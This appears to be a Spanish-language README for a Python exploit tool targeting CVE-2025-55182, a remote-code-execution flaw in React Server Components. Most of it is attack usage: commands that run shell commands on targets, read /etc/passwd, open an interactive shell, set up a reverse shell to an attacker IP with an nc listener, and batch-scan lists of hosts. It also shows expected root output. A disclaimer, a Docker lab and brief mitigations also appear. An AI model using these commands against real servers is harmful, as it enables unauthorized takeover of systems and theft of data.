Exploit basado en Python para CVE-2025-55182 (RCE en React Server Components) con shell interactivo, reverse shell, escaneo por lotes y entorno vulnerable basado en Docker para pruebas de seguridad autorizadas.
⚠️ Aviso legal: Esta herramienta es solo para fines de investigación de seguridad, pruebas de penetración autorizadas y educación. Usar esta herramienta contra sistemas objetivo sin permiso explícito es ilegal y poco ético.
CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código (RCE) en React Server Components (RSC), que permite a atacantes no autenticados ejecutar código arbitrario en el servidor mediante la deserialización de JavaScript malicioso.
| Propiedad | Valor |
|---|
| CVE ID | CVE-2025-55182 |
| Puntuación CVSS | 9.8 (Crítico) |
| Vector de ataque | Red |
| Complejidad del ataque | Baja |
| Privilegios requeridos | Ninguno |
| Interacción del usuario | Ninguna |
| Impacto | Alto (Confidencialidad, Integridad, Disponibilidad) |
| Componente afectado | React Server Components (RSC) |
| Versiones afectadas | React 18.x - 19.x (versiones de compilación específicas) |
| Fecha de divulgación | 3 de diciembre de 2025 |
| Alias CVE | React2Shell |
Causa raíz: React Server Components deserializa incorrectamente objetos JavaScript proporcionados por el usuario al procesar cargas útiles de RSC, permitiendo a atacantes inyectar código malicioso que se ejecuta en el servidor.
Vector de ataque: Carga útil maliciosa de RSC en solicitudes HTTP Impacto: Ejecución remota de código sin autenticación, toma de control del servidor, fuga de datos
# Clonar repositorio
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# Instalar dependencias
pip install -r requirements.txt
# Instalar dependencias
pip install requests
# Ejecutar comando en objetivo vulnerable
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# Modo shell interactivo
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# Comando personalizado
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# Establecer shell inversa con IP/puerto personalizados
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# Escaneo por lotes
python exploit/batch_scanner.py -f targets.txt
# Modo detallado
python exploit/cve_2025_55182.py -u http://target.com -v
# User-Agent personalizado
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
Accede a la aplicación vulnerable: http://localhost:3000
Ejecutar un solo comando en el servidor vulnerable:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
Salida esperada:
[+] Vulnerabilidad detectada con éxito: React Server Components RCE
[+] Ejecutando comando: id
[+] Respuesta:
uid=0(root) gid=0(root) groups=0(root)
Obtener un shell interactivo en el servidor vulnerable:
python exploit/cve_2025_55182.py -u http://target.com --shell
Características:
Establecer una conexión de shell inversa:
# En la máquina del atacante
nc -lvnp 4444
# Ejecutar la herramienta de explotación
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
Escanear múltiples objetivos en busca de la vulnerabilidad:
# Crear archivo de objetivos
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# Ejecutar escáner por lotes
python exploit/batch_scanner.py -f targets.txt
Actualizar React
npm install react@latest
# Actualizar a la versión corregida
Bloquear solicitudes RSC
// Deshabilitar temporalmente RSC
const config = {
enableRSC: false
}
Reglas WAF
# Configurar entorno vulnerable
cd target && docker-compose up -d
# Probar vulnerabilidad
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# Ejecutar suite de pruebas
python tests/test_exploit.py
Esta herramienta demuestra:
Este proyecto está licenciado bajo MIT - consulte el archivo LICENSE.
Importante: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas.
Al usar esta herramienta, usted acepta:
Si descubre esta vulnerabilidad en sistemas de producción:
Reportar al proveedor
Asignación CVE
Comunidad de seguridad
Recuerde: La investigación de seguridad siempre debe ser ética y legal. ¡Use sus habilidades para hacer Internet más seguro! 🛡️